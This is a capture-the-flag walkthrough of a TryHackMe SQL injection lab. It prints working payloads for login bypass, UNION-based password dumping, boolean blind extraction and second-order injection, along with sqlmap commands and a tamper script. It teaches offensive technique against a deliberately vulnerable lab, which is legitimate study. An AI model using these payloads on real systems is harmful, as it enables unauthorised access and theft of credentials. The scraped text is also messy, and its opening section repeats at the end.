SQL Injection Lab Tryhackme Writeup (2024)

This is a Writeup of Tryhackme room “SQL Injection Lab”

SQL Injection Lab Tryhackme Writeup (1)

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InfoSec Write-ups


58 min read


Apr 20, 2021


SQL Injection Lab Tryhackme Writeup (3)

Room link: https://tryhackme.com/room/sqlilab
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SQL Injection Tryhackme Writeup

SQL Injection Lab Tryhackme Writeup (4)

SQL injection is a technique through which attackers can execute their own malicious SQL statements generally referred to as a malicious payload. Through the malicious SQL statements, attackers can steal information from the victim’s database; even worse, they may be able to make changes to the database. Our employee management web application has SQL injection vulnerabilities, which mimic the mistakes frequently made by developers.

Applications will often need dynamic SQL queries to be able to display content based on different conditions set by the user. To allow for dynamic SQL queries, developers often concatenate user input directly into the SQL statement. Without checks on the received input, string concatenation becomes the most common mistake that leads to SQL injection vulnerability. Without input sensitization, the user can make the database interpret the user input as a SQL statement instead of as data. In other words, the attacker must have access to a parameter that they can control, which goes into the SQL statement. With control of a parameter, the attacker can inject a malicious query, which will be executed by the database. If the application does not sanitize the given input from the attacker-controlled parameter, the query will be vulnerable to SQL injection attack.

The following PHP code demonstrates a dynamic SQL query in a login from. The user and password variables from the POST request is concatenated directly into the SQL statement.

$query = "SELECT * FROM users WHERE username='" + $_POST["user"] + "' AND password= '" + $_POST["password"]$ + '";"

If the attacker supplies the value ‘ OR 1=1 — — inside the name parameter, the query might return more than one user. Most applications will process the first user returned, meaning that the attacker can exploit this and log in as the first user the query returned. The double-dash ( — ) sequence is a comment indicator in SQL and causes the rest of the query to be commented out. In SQL, a string is enclosed within either a single quote (‘) or a double quote (“). The single quote (‘) in the input is used to close the string literal. If the attacker enters ‘ OR 1=1 — — in the name parameter and leaves the password blank, the query above will result in the following SQL statement.

SELECT * FROM users WHERE username = '' OR 1=1-- -' AND password = ''

If the database executes the SQL statement above, all the users in the users table are returned. Consequently, the attacker bypasses the application’s authentication mechanism and is logged in as the first user returned by the query.

The reason for using — — instead of — is primarily because of how MySQL handles the double-dash comment style.

From a — sequence to the end of the line. In MySQL, the — (double-dash) comment style requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on). This syntax differs slightly from standard SQL comment syntax, as discussed in Section, “‘ — ‘ as the Start of a Comment”. (dev.mysql.com)

The safest solution for inline SQL comment is to use — <space><any character> such as — — because if it is URL-encoded into — %20- it will still be decoded as — -. For more information, see: https://blog.raw.pm/en/sql-injection-mysql-comment/

SQL Injection 1: Input Box Non-String

When a user logs in, the application performs the following query:

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID=10 AND password = 'ce5ca67...'

When logging in, the user supplies input to the profileID parameter. For this challenge, the parameter accepts an integer, as can be seen here:


Since there is no input sanitization, it is possible to bypass the login by using any True condition such as the one below as the ProfileID

1 or 1=1-- -

Bypass the login and retrieve the flag.

SQL Injection 2: Input Box String

This challenge uses the same query as in the previous challenge. However, the parameter expects a string instead of an integer, as can be seen here:


Since it expects a string, we need to modify our payload to bypass the login slightly. The following line will let us in:

1' or '1'='1'-- -

Bypass the login and retrieve the flag.

SQL Injection 3 and 4: URL and POST Injection

Here, the SQL query is the same as the previous one:

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID='10' AND password='ce5ca67...'

But in this case, the malicious user input cannot be injected directly into the application via the login form because some client-side controls have been implemented:

function validateform() {var profileID = document.inputForm.profileID.value;var password = document.inputForm.password.value;if (/^[a-zA-Z0-9]*$/.test(profileID) == false || /^[a-zA-Z0-9]*$/.test(password) == false) {alert("The input fields cannot contain special characters");return false;}if (profileID == null || password == null) {alert("The input fields cannot be empty.");return false;}}

The JavaScript code above requires that both the profileID and the password only contains characters between a-z, A-Z, and 0–9. Client-side controls are only there to improve the user experience and is in no way a security feature as the user has full control over the client and the data it submits. For example, a proxy tool such as Burp Suite can be used to bypass the client side JavaScript validation (https://portswigger.net/support/using-burp-to-bypass-client-side-javascript-validation).

Q.1:What is the flag for SQL Injection 1: Input Box Non-String?

SQL Injection Lab Tryhackme Writeup (5)
SQL Injection Lab Tryhackme Writeup (6)

Q.2:What is the flag for SQL Injection 2: Input Box String?

SQL Injection Lab Tryhackme Writeup (7)
SQL Injection Lab Tryhackme Writeup (8)

Q.3:What is the flag for SQL Injection 3: URL Injection?

This challenge uses a GET request when submitting the login form, as seen here:

SQL Injection Lab Tryhackme Writeup (9)

The login and the client-side validation can then easily be bypassed by going directly to this URL:' or 1=1 --a' or 1=1 --&password=a

The browser will automatically urlencode this for us. Urlencoding is needed since the HTTP protocol does not support all characters in the request. When urlencoded, the URL looks as follows:

Convert your payload into urlencode using HackBar 2 Extention

SQL Injection Lab Tryhackme Writeup (10)
SQL Injection Lab Tryhackme Writeup (11)

The %27 becomes the single quote (‘) character and %20 becomes a blank space.

SQL Injection Lab Tryhackme Writeup (12)
SQL Injection Lab Tryhackme Writeup (13)

Q.4:What is the flag for SQL Injection 4: POST Injection?

SQL Injection 4: POST Injection When submitting the login form for this challenge, it uses the HTTP POST method. It is possible to either remove/disable the JavaScript validating the login form or submit a valid request and intercept it with a proxy tool such as Burp Suite and modify it:

It means url will not show any parameter

that’s why we use burpsuite to see parameter and change it

SQL Injection Lab Tryhackme Writeup (14)

Capture the request

SQL Injection Lab Tryhackme Writeup (15)

Change the profileID with a’ or 1=1 —

SQL Injection Lab Tryhackme Writeup (16)

and click on forward

SQL Injection Lab Tryhackme Writeup (17)

Log in to the “SQL Injection 5: UPDATE Statement” challenge and exploit the vulnerable profile page to find the flag. The credentials that can be used are:

profileID: 10

password: toor

The same enumeration demonstrated for finding tables and column names must be done here since the flag is stored inside another table.

SQL Injection Lab Tryhackme Writeup (18)
SQL Injection Lab Tryhackme Writeup (19)

SQL Injection Attack on an UPDATE Statement

If a SQL injection occurs on an UPDATE statement, the damage can be much more severe as it allows one to change records within the database. In the employee management application, there is an edit profile page as depicted in the following figure.

SQL Injection Lab Tryhackme Writeup (20)

This edit page allows the employees to update their information, but they do not have access to all the available fields, and the user can only change their information. If the form is vulnerable to SQL injection, an attacker can bypass the implemented logic and update fields they are not supposed to, or for other users.

We will now enumerate the database via the UPDATE statement on the profile page. We will assume we have no prior knowledge of the database. By looking at the web page’s source code, we can identify potential column names by looking at the name attribute. The columns don’t necessarily need to be named this, but there is a good chance of it, and column names such as “email” and “password” are not uncommon and can easily be guessed.

SQL Injection Lab Tryhackme Writeup (21)

To confirm that the form is vulnerable and that we have working column names, we can try to inject something similar to the code below into the nickName and email field:


When injecting the malicious payload into the nickName field, only the nickName is updated. When injected into the email field, both fields are updated:

SQL Injection Lab Tryhackme Writeup (22)
SQL Injection Lab Tryhackme Writeup (23)

The first test confirmed that the application is vulnerable and that we have the correct column names. If we had the wrong column names, then non of the fields would have been updated. Since both fields are updated after injecting the malicious payload, the original SQL statement likely looks something similar to the following code:

UPDATE <table_name> SET nickName='name', email='email' WHERE <condition>

With this knowledge, we can try to identify what database is in use. There are a few ways to do this, but the easiest way is to ask the database to identify itself. The following queries can be used to identify MySQL, MSSQL, Oracle, and SQLite:

# MySQL and MSSQL',nickName=@@version,email='# For Oracle',nickName=(SELECT banner FROM v$version),email='# For SQLite',nickName=sqlite_version(),email='
SQL Injection Lab Tryhackme Writeup (24)
SQL Injection Lab Tryhackme Writeup (25)

Knowing what database we are dealing with makes it easier to understand how to construct our malicious queries. We can proceed to enumerate the database by extracting all the tables. In the code below, we perform a subquery to fetch all the tables from database and place them into the nickName field. The subquery is enclosed inside parantheses. The group_concat() function is used to dump all the tables simultaneously.

“The group_concat() function returns a string which is the concatenation of all non-NULL values of X. If parameter Y is present then it is used as the separator between instances of X. A comma (“,”) is used as the separator if Y is omitted. The order of the concatenated elements is arbitrary.”

',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='
SQL Injection Lab Tryhackme Writeup (26)

By injecting the code above, we can see that the only table in the database is called “usertable” and “secrets”

SQL Injection Lab Tryhackme Writeup (27)

We can then continue by extract all the column names from the usertable:

',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='
SQL Injection Lab Tryhackme Writeup (28)

And as can be seen below, the usertable contains the columns: UID, name, profileID, salary, passportNr, email, nickName, and password:

SQL Injection Lab Tryhackme Writeup (29)

By knowing the names of the columns, we can extract the data we want from the database. For example, the query below will extract profileID, name, and passwords from secrets. The subquery is using the group_concat() function to dump all the information simultaneously, and the || operator is “concatenate” — it joins together the strings of its operands (sqlite.org).

',nickName=(SELECT group_concat(id || "," || author|| "," || secret|| ":") from secrets),email='
SQL Injection Lab Tryhackme Writeup (30)
SQL Injection Lab Tryhackme Writeup (31)

Boom ! we got flag

From the landing page on, go to Broken Authentication under Track: Vulnerable Startup (

SQL Injection Lab Tryhackme Writeup (32)

Bypass the login and retrieve the flag.

SQL Injection Lab Tryhackme Writeup (33)

This challenge builds upon the previous challenge. Here, the goal is to find a way to dump all the passwords in the database to retrieve the flag without using blind injection.

The login form is still vulnerable to SQL injection, and it is possible to bypass the login by using OR 1=1 — -as a username.

Before dumping all the passwords, we need to identify places where results from the login query is returned within the application. After logging in, the name of the currently logged-on user is displayed in the top right corner, so it might be possible to dump the data there, as seen here:

SQL Injection Lab Tryhackme Writeup (34)
SQL Injection Lab Tryhackme Writeup (35)

Data from the query could also be stored in the session cookie. It is possible to extract the session cookie by opening developer tools in the browser, which can be done by pressing F12. Then navigate to Storage and copy the value of the session cookie, as seen here:

SQL Injection Lab Tryhackme Writeup (36)

Then it is possible to decode the cookie at https://www.kirsle.net/wizards/flask-session.cgi or via a custom script. A script to decode the cookie can be downloaded inside the VM by going to

After having logged in with ‘ OR 1=1 — -as username, the decoded cookie can be seen below, and it is clear that the user id and username from the login query are placed inside it.

SQL Injection Lab Tryhackme Writeup (37)
SQL Injection Lab Tryhackme Writeup (38)

It is possible to dump the passwords by using a UNION based SQL injection. There are two key requirements that must be met for a UNION based injection to work:

  • The number of columns in the injected query must be the same as in the original query
  • The data types for each column must match the corresponding type

When logging in to the application, it executed the query below. From the SQL statement, we can see that it is retrieving two columns; id and username.

SELECT id, username FROM users WHERE username = '" + username + "' AND password = '" + password + "'

Try this one by one

SQL Injection Lab Tryhackme Writeup (39)
SQL Injection Lab Tryhackme Writeup (40)

it says Query executed .In this case, successful means that the application will successfully login when the correct number of columns is injected. In other cases, if error messages are enabled, a warning might be displayed saying “SELECTs to the left and right of UNION do not have the same number of result columns” when incorrect number of columns are injected.

By using ‘ UNION SELECT 1,2 — -as username, we match the number of columns in the original SQL query, and the application lets us in. After logging in, we can see that the username is replaced with the integer 2, which is what we used as column two in the injected query.

SQL Injection Lab Tryhackme Writeup (41)
SQL Injection Lab Tryhackme Writeup (42)

The same goes for the username in the session cookie. By decoding it, we can see that the username has been replaced with the same value as above

SQL Injection Lab Tryhackme Writeup (43)
SQL Injection Lab Tryhackme Writeup (44)

Enumerate the database to find tables and columns, as we did under Task 2 Introduction to SQL Injection. A cheat sheet such as PayloadsAllTheThings can be helpful for this. The challenge’s objective was to dump all the passwords to get the flag, so in this case, we will guess that the column name is password and that the table name is users. With this logic, it is possible to dump the passwords with the following code:

' UNION SELECT 1, password from users-- -
SQL Injection Lab Tryhackme Writeup (45)
SQL Injection Lab Tryhackme Writeup (46)

However, the previous statement will only return one password. The group_concat() function can help achieve the goal of dumping all the passwords simultaneously.

By injecting the following code into the username field:

' UNION SELECT 1,group_concat(password) FROM users-- -
SQL Injection Lab Tryhackme Writeup (47)

Boom ! we got Flag

This challenge has the same vulnerability as the previous one. However, it is no longer possible to extract data from the Flask session cookie or via the username display. The login form still has the same vulnerability, but this time the goal is to abuse the login form with blind SQL injection to extract the admin’s password.

Boolean-based blind SQL injection will be used to extract the password. Blind injections are tedious and time-consuming to do manually, so the plan is to build a script to extract the password character by character. Before making a script to automate the injection, it is vital to understand how the injection works. The idea is to send a SQL query asking true or false questions for each character in the password. The application’s response will be analyzed to understand whether the database returned true or false. In this case, the application will let us in if the response is successful, or it will stay on the login page saying, “Invalid username or password” in the case it returns false, as seen in the image below.

SQL Injection Lab Tryhackme Writeup (48)

As previously stated, we will want to send boolean questions to the database for each character in the password, asking the database whether we have guessed the correct character or not. To achieve this, we will need a way to control which character we are at and increment it every time we have guessed the correct character at the current position. SQLite’s substr function can help us achieve this functionality.

“The SQLite substr function returns a substring from a string starting at a specified position with a predefined length.” (SQLite Tutorial)

The first argument to substr is the string itself, which will be the admin’s password. The second argument is the starting position, and the third argument is the length of the substring that will be returned.

SUBSTR( string, <start>, <length>)

Below is an example of substr in action — the character after the equal (=) sign demonstrates the substring returned.

-- Changing startSUBSTR("THM{Blind}", 1,1) = TSUBSTR("THM{Blind}", 2,1) = HSUBSTR("THM{Blind}", 3,1) = M-- Changing lengthSUBSTR("THM{Blind}", 1,3) = THM

The next step will be to enter the admin’s password as a string into the substr function. This can be achieved with the following query:

(SELECT password FROM users LIMIT 0,1)

The LIMIT clause is used to limit the amount of data returned by the SELECT statement. The first number, 0, is the offset and the second integer is the limit:


Below are a few examples of the LIMIT clause in action. The right table represents the user table.

sqlite> SELECT password FROM users LIMIT 0,1THM{Blind}sqlite> SELECT password FROM users LIMIT 1,1Summer2019!sqlite> SELECT password FROM users LIMIT 0,2THM{Blind}Summer2019!


The SQL query to return the first character of the admin’s password can be seen here:

SUBSTR((SELECT password FROM users LIMIT 0,1),1,1)

Now we will need a way to compare the first character of the password with our guessed value. Comparing the characters are easy, and we could do it as follows:

SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) = 'T'

However, whether this approach works or not will be depending on how the application handles the inputs. The application will convert the username to lowercase for this challenge, which breaks the mentioned approach since capital T is not the same as lowercase t. The hex representation of ASCII T is 0x54 and 0x74 for lowercase t. To deal with this, we can input our character as hex representation via the substitution type X and then use SQLite’s CAST expression to convert the value to the datatype the database expects.

“x,X: The argument is an integer which is displayed in hexadecimal. Lower-case hexadecimal is used for %x and upper-case is used for %X” — (sqlite.org)

This means that we can input T as X’54'. To convert the value to SQLite’s Text type, we can use the CAST expression as follows: CAST(X’54' as Text). Our final query now looks as follows:

SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) = CAST(X'54' as Text)

Before using the query we have built, we will need to make it fit in with the original query. Our query will be placed in the username field. We can close the username parameter by adding a single quote (‘) and then append an AND operator to add our condition to it. Then append two dashes ( — ) to comment out the password check at the end of the query. With this done, our malicious query look as follows:

admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) = CAST(X'54' as Text)-- -

When this is injected into the username field, the final query executed by the database will be:

SELECT id, username FROM users WHERE username = 'admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) = CAST(X'54' as Text)

If the application responds with a 302 redirect, then we have found the password’s first character. To get the entire password, the attacker must inject multiple tests for each character in the password. Testing every single character is tedious and is more easily achieved with a script. One easy solution is to loop over every possible ASCII character and compare it with the database’s character. The mentioned method generates a lot of traffic toward the target and is not the most efficient method. An example script is provided inside the machine and can be view and downloaded by going to; note that it will be necessary to change the password length with the password_len variable. The length of the password can be found by asking the database. For example, in the query below, we ask the database if the length of the password equals 37:

admin' AND length((SELECT password from users where username='admin'))==37-- -
SQL Injection Lab Tryhackme Writeup (49)
SQL Injection Lab Tryhackme Writeup (50)

Also, the script requires an unnecessary amount of requests. An extra challenge could be to build a more efficient tool to retrieve the password.

An alternative way to solve this challenge is by using a tool such as sqlmap, which is an open source tool that automates the process of detecting and exploiting SQL injection flaws. The following command can be used to exploit the vulnerability with sqlmap:

sqlmap -u --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b --dump
SQL Injection Lab Tryhackme Writeup (51)


Here, the previous vulnerabilities have been fixed, and the login form is no longer vulnerable to SQL injection. The team has added a new note function, allowing users to add notes on their page. The goal of this challenge is to find the vulnerability and dump the database to find the flag.


By registering a new account and logging in to the application, the user can navigate to the new note function by clicking “Notes” in the top left menu. Here, it is possible to add new notes, and all the user’s notes are listed on the bottom of the page, as seen here:

SQL Injection Lab Tryhackme Writeup (52)

The notes function is not directly vulnerable, as the function to insert notes is safe because it uses parameterized queries. With parameterized queries, the SQL statement is specified first with placeholders (?) for the parameters. Then the user input is passed into each parameter of the query later. Parameterized queries allow the database to distinguish between code and data, regardless of the input.

INSERT INTO notes (username, title, note) VALUES (?, ?, ?)

Even though parameterized queries are used, the server will accept malicious data and place it in the database if the application does not sanitize it. Still, the parameterized query prevents the input from leading to SQL injection. Since the application might accept malicious data, all queries must use parameterized queries, and not only for queries directly accepting user input.

The user registration function also utilizes parameterized queries, so when the query below is executed, only the INSERT statement gets executed. It will accept any malicious input and place it in the database if it doesn’t sanitize it, but the parameterized query prevents the input from leading to SQL injection.

INSERT INTO users (username, password) VALUES (?, ?)

However, the query that fetches all of the notes belonging to a user does not use parameterized queries. The username is concatenated directly into the query, making it vulnerable to SQL injection.

SELECT title, note FROM notes WHERE username = '" + username + "'

This means that if we register a user with a malicious name, everything will be fine until the user navigates to the notes page and the unsafe query tries to fetch the data for the malicious user.

By creating a user with the following name:

' union select 1,2'

We should be able to trigger the secondary injection:

SQL Injection Lab Tryhackme Writeup (53)

With this username, the application performs the following query:

SELECT title, note FROM notes WHERE username = '' union select 1,2''

Then on the notes page as the new user, we can see that the first column in the query is the note title, and the second column is the note itself:

SQL Injection Lab Tryhackme Writeup (54)

With this knowledge, this is rather easy to exploit. For example, to get all the tables from the database, we can create a user with the name:

' union select 1,group_concat(tbl_name) from sqlite_master where type='table' and tbl_name not like 'sqlite_%''

To find the flag among the passwords, register a user with the name:

‘ union select 1,group_concat(password) from users’

Automating Exploitation Using Sqlmap

It is possible to use sqlmap to automate this attack, but a standard attack with sqlmap will fail. The injection happens at the user registration, but the vulnerable function is located on the notes page. For sqlmap to exploit this vulnerability, it must do the following steps:

  1. Register a malicious user
  2. Login with the malicious user
  3. Go to the notes page to trigger the injection

It is possible to achieve all of the necessary steps by creating a tamper script. Sqlmap supports tamper scripts, which are scripts used for tampering with injection data. With a tamper script, we can easily modify the payload, for example, adding a custom encoding to it. It also allows us to set other things, such as cookies.

There are two custom functions in the tamper script below. The first function is create_account(), which register a user with sqlmap’s payload as name and ‘asd’ as password. The next custom function is login(), which logs sqlmap in as the newly created user and returns the Flask session cookie. tamper() is the main function in the script, and it has the payload and **kwargs as arguments. **kwargs holds information such as the HTTP headers, which we need to place the Flask session cookie onto the request to allow sqlmap to go to the notes page to trigger the SQL injection. The tamper() function first gets the headers from kwargs, then creates a new user on the application, and then it logs in to the application and sets the Flask session onto the HTTP header object.

#!/usr/bin/pythonimport requestsfrom lib.core.enums import PRIORITY__priority__ = PRIORITY.NORMALaddress = ""password = "asd"def dependencies():passdef create_account(payload):with requests.Session() as s:data = {"username": payload, "password": password}resp = s.post(f"{address}/signup", data=data)def login(payload):with requests.Session() as s:data = {"username": payload, "password": password}resp = s.post(f"{address}/login", data=data)sessid = s.cookies.get("session", None)return "session={}".format(sessid)def tamper(payload, **kwargs):headers = kwargs.get("headers", {})create_account(payload)headers["Cookie"] = login(payload)return payload

The folder where the tamper script is located will also need an empty __init__.py file for sqlmap to be able to load it. Before starting sqlmap with the tamper script, change the address and password variable inside the script. With this done, it is possible to exploit the vulnerability with the following command:

sqlmap --tamper so-tamper.py --url --data "username=admin&password=asd"--second-url -p username --dbms sqlite --technique=U --no-cast# --tamper so-tamper.py - The tamper script# --url - The URL of the injection point, which is /signup in this case# --data - The POST data from the registraion form to /signup.# Password must be the same as the password in the tamper script# --second-url - Visit this URL to check for results# -p username - The parameter to inject to# --dbms sqlite - To speed things up# --technique=U - The technique to use. [U]nion-based# --no-cast - Turn off payload casting mechanism

Dumping the users table might be hard without turning off the payload casting mechanism with the — no-cast parameter. An example of the difference between casting and no casting can be seen here:

— With casting enabled:

admin' union all select min(cast(x'717a717071' as text)||coalesce(cast(sql as text),cast(x'20' as text)))||cast(x'716b786271' as text),null from sqlite_master where tbl_name=cast(x'7573657273' as text)-- daqo'-- 7573657273 is 'users' in ascii

— Without casting:

admin' union all select cast(x'717a6a7871' as text)||id||cast(x'6774697a7462' as text)||password||cast(x'6774697a7462' as text)||username||cast(x'7162706b71' as text),null from users-- ypfr'

When sqlmap asks, answer no to follow 302 redirects, then answer yes to continue further testing if it detects some WAF/IPS. Answer no when asked if you want to merge cookies in future requests, and say no to reduce the number of requests. As seen in the image below, sqlmap was able to find the vulnerability, which allows us to automate the exploitation of it.

SQL Injection Lab Tryhackme Writeup (55)

The flag can then be found by dumping the users table:

sqlmap --tamper tamper/so-tamper.py --url --data "username=admin&password=asd" --second-url -p username --dbms=sqlite --technique=U --no-cast -T users --dump

Sqlmap is quite noisy and will add a lot of users attempting to exploit this application. Because of this, the output will be trimmed and the message below can be seen.

[WARNING] console output will be trimmed to last 256 rows due to large table size

However, all the data is saved and written to a dump file, as seen in the image below. Read the top of the dump file to get the flag:

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NB: The flag will differ on the live system.

Exploit the vulnerable function and retrieve the flag.

What is the flag for this challenge?

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SQL Injection Lab Tryhackme Writeup (58)
SQL Injection Lab Tryhackme Writeup (59)

add “-T users — dump” in the last

sqlmap --tamper so-tamper.py --url --data "username=admin&password=asd" --second-url -p username --dbms=sqlite --technique=U --no-cast -T users --dump
SQL Injection Lab Tryhackme Writeup (60)

For this challenge, the vulnerability on the note page has been fixed. A new change password function has been added to the application, so the users can now change their password by navigating to the Profile page. The new function is vulnerable to SQL injection because the UPDATE statement concatenates the username directly into the SQL query, as can be seen below. The goal here is to exploit the vulnerable function to gain access to the admin’s account.

The developer has used a placeholder for the password parameter because this input comes directly from the user. The username does not come directly from the user but is rather fetched from the database based on the user id stored in the session object. Therefore, the developer has thought that the username was safe to use and concatenated it directly into the query instead of using a placeholder:

UPDATE users SET password = ? WHERE username = '" + username + "'

To exploit this vulnerability and gain access to the admin’s user account, we can create a user with the name admin'-- -.

After having registered the malicious user, we can update the password for our new user to trigger the vulnerability. When changing the password, the application executes two queries. First, it asks the database for the username and password for our current user:

SELECT username, password FROM users WHERE id = ?

If all checks are fine, it will try to update the password for our user. Since the username gets concatenated directly into the SQL query, the executed query will look as follows:

UPDATE users SET password = ? WHERE username = 'admin' -- -'

This means that instead of updating the password for admin' -- -, the application updated the password for the admin user. After having updated the password, it is possible to log in as admin with the new password and view the flag.

Create a new user and exploit the vulnerability in the update password function to access the admin account to get the flag.

Lets create new user with admin’ — -:asd

SQL Injection Lab Tryhackme Writeup (61)

Now Login into the user admin’ — -:asd

SQL Injection Lab Tryhackme Writeup (62)

After login goto profile page and change password with this query

old password = asd

new password = pass

SQL Injection Lab Tryhackme Writeup (63)

yes password has been changed now login into admin as admin:pass

SQL Injection Lab Tryhackme Writeup (64)
SQL Injection Lab Tryhackme Writeup (65)

BOOM ! We got Flag

A new function has been added to the page, and it is now possible to search books in the database. The new search function is vulnerable to SQL injection because it concatenates the user input directly into the SQL statement. The goal of the task is to abuse this vulnerability to find the hidden flag.

When the user first logs into the challenge, they are presented with a message saying:

Testing a new function to search for books, check it out here

The ‘here’ text is a link taking the user to, which is the page containing the vulnerable search function and can be seen here:

SQL Injection Lab Tryhackme Writeup (66)

The web page performs a GET request with the parameter title when searching for a book. The query it performs can be seen here:

SELECT * from books WHERE id = (SELECT id FROM books WHERE title like '" + title + "%')

All we need to do to abuse this is closing the LIKE operand to the right of the LIKE operator. For example, we can dump all the books in the database by injecting the following command:

') or 1=1-- -

Use what you learned about UNION-based SQL injection and exploit the vulnerable book search function to retrieve the flag.

Create new user sam2:asd

and login into account

SQL Injection Lab Tryhackme Writeup (67)

we can dump all the books in the database by injecting the following command:

') or 1=1-- -
SQL Injection Lab Tryhackme Writeup (68)

Without knowing the number of columns upfront, the attacker must first enumerate the number of columns by systematically injecting queries with different numbers of columns until it is show error. For example:

Try every one by one every payload

') order by 1-- -
') order by 2-- -
') order by 3-- -
') order by 4-- -
') order by 5-- -
SQL Injection Lab Tryhackme Writeup (69)

when i try

') order by 5-- -
SQL Injection Lab Tryhackme Writeup (70)

It did’nt show me anything it means this is error for attacker

it means in the database there is 4 columns only

Lets’ Check how many columns are vulnerable to do this we use UNION SELECT

') union select 1,2,3,4-- -
SQL Injection Lab Tryhackme Writeup (71)

the query shows 3 columns are vulnerable {2,3,4} position

lets fetch the information from the database

if you know mysql you can easly understand this query

') union select 1,group_concat(username),group_concat(password),4 from users-- -
SQL Injection Lab Tryhackme Writeup (72)

In this challenge, the application performs a query early in the process. It then uses the result from the first query in the second query later without sanitization. Both queries are vulnerable, and the first query can be exploited through blind SQL injection. However, since the second query is also vulnerable, it is possible to simplify the exploitation and use UNION based injection instead of Boolean-based blind injection; making the exploitation easier and less noisy. The goal of the task is to abuse this vulnerability without using blind SQL injection and retrieve the flag.

When the user first logs into the challenge, they are presented with a message saying:

Testing a new function to search for books, check it out here

The ‘here’ text is a link taking the user to, which is the page containing the vulnerable search function and can be seen here:

SQL Injection Lab Tryhackme Writeup (73)

When searching for a book title, the web page performs a GET request. The application then performs two queries where the first query gets the book’s ID, then later on in the process, a new SQL query is performed to get all information about the book. The two queries can be seen here:

bid = db.sql_query(f"SELECT id FROM books WHERE title like '{title}%'", one=True)if bid:query = f"SELECT * FROM books WHERE id = '{bid['id']}'"

First, we will limit the result to zero rows, which can be done by not giving it any input or input we know does not exist. Then we can use the UNION clause to control what the first query returns, which is the data that will be used in the second query. Meaning that we can inject the following value into the search field:

' union select 'STRING

After injecting the code above, the application will perform the following SQL queries:

SQL Injection Lab Tryhackme Writeup (74)

From queries, we can see that the result from query one is STRING%, which is used in the WHERE clause of the second query.

If we replace ‘STRING with a number that exists in the database, the application should return a valid object. However, the application adds a wildcard (%) to the string, meaning that we must comment out the wildcard first. The wildcard can be commented out by appending ‘ — — to the end of the string we are injecting. For example, if we inject the following line:

' union select '1'-- -

The application should display the book with ID 1 back to the user, as seen here:

SQL Injection Lab Tryhackme Writeup (75)

If we did not limit the result to zero rows first, we would not have gotten the output of the UNION statement but rather the content from the LIKE clause. For example, by injecting the following string:

test' union select '1'-- -

The application would have executed the following queries:.

SQL Injection Lab Tryhackme Writeup (76)

Now that we have full control of the second query, we can use UNION-based SQL injection to extract data from the database. The goal is to make the second query look something similar to the following query:

SELECT * FROM books WHERE id = '' union select 1,2,3,4-- -

Making the application execute the query above should be as easy as injecting the following query:

' union select '1' union select 1,2,3,4-- -

However, we are closing the string that is supposed to be returned by appending the single quote (‘) before the second UNION clause. To make the query work and return our second UNION clause, we will have to escape the single quote. Escaping the single quote can be done by doubling up the quote (‘’). After having doubled the quotes, we have the following string:

' union select '-1''union select 1,2,3,4-- -

Injecting the string above will return the page seen here:

SQL Injection Lab Tryhackme Writeup (77)

Use what you learned about UNION-based SQL injection and exploit the vulnerable book search function to retrieve the flag

' union select '-1''union select 1,group_concat(username),group_concat(password),4 from users-- -
SQL Injection Lab Tryhackme Writeup (78)

BOOM ! we Got Final Flag

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SQL Injection Lab Tryhackme Writeup (79)

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By Shamsher khan This is a Writeup of Tryhackme room “SQL Injection Lab”

SQL Injection Lab Tryhackme Writeup (80)

Room link: https://tryhackme.com/room/sqlilab
Note: This room is Free

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SQL Injection Tryhackme Writeup

SQL Injection Lab Tryhackme Writeup (81)

SQL injection is a technique through which attackers can execute their own malicious SQL statements generally referred to as a malicious payload. Through the malicious SQL statements, attackers can steal information from the victim’s database; even worse, they may be able to make changes to the database. Our employee management web application has SQL injection vulnerabilities, which mimic the mistakes frequently made by developers.

Applications will often need dynamic SQL queries to be able to display content based on different conditions set by the user. To allow for dynamic SQL queries, developers often concatenate user input directly into the SQL statement. Without checks on the received input, string concatenation becomes the most common mistake that leads to SQL injection vulnerability. Without input sensitization, the user can make the database interpret the user input as a SQL statement instead of as data. In other words, the attacker must have access to a parameter that they can control, which goes into the SQL statement. With control of a parameter, the attacker can inject a malicious query, which will be executed by the database. If the application does not sanitize the given input from the attacker-controlled parameter, the query will be vulnerable to SQL injection attack.

The following PHP code demonstrates a dynamic SQL query in a login from. The user and password variables from the POST request is concatenated directly into the SQL statement.

$query = "SELECT * FROM users WHERE username='" + $_POST["user"] + "' AND password= '" + $_POST["password"]$ + '";"

If the attacker supplies the value ‘ OR 1=1 — — inside the name parameter, the query might return more than one user. Most applications will process the first user returned, meaning that the attacker can exploit this and log in as the first user the query returned. The double-dash ( — ) sequence is a comment indicator in SQL and causes the rest of the query to be commented out. In SQL, a string is enclosed within either a single quote (‘) or a double quote (“). The single quote (‘) in the input is used to close the string literal. If the attacker enters ‘ OR 1=1 — — in the name parameter and leaves the password blank, the query above will result in the following SQL statement.

SELECT * FROM users WHERE username = '' OR 1=1-- -' AND password = ''

If the database executes the SQL statement above, all the users in the users table are returned. Consequently, the attacker bypasses the application’s authentication mechanism and is logged in as the first user returned by the query.

The reason for using — — instead of — is primarily because of how MySQL handles the double-dash comment style.

From a — sequence to the end of the line. In MySQL, the — (double-dash) comment style requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on). This syntax differs slightly from standard SQL comment syntax, as discussed in Section, “‘ — ‘ as the Start of a Comment”. (dev.mysql.com)

The safest solution for inline SQL comment is to use — <space><any character> such as — — because if it is URL-encoded into — %20- it will still be decoded as — -. For more information, see: https://blog.raw.pm/en/sql-injection-mysql-comment/

SQL Injection 1: Input Box Non-String

When a user logs in, the application performs the following query:

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID=10 AND password = 'ce5ca67...'

When logging in, the user supplies input to the profileID parameter. For this challenge, the parameter accepts an integer, as can be seen here:


Since there is no input sanitization, it is possible to bypass the login by using any True condition such as the one below as the ProfileID

1 or 1=1-- -

Bypass the login and retrieve the flag.

SQL Injection 2: Input Box String

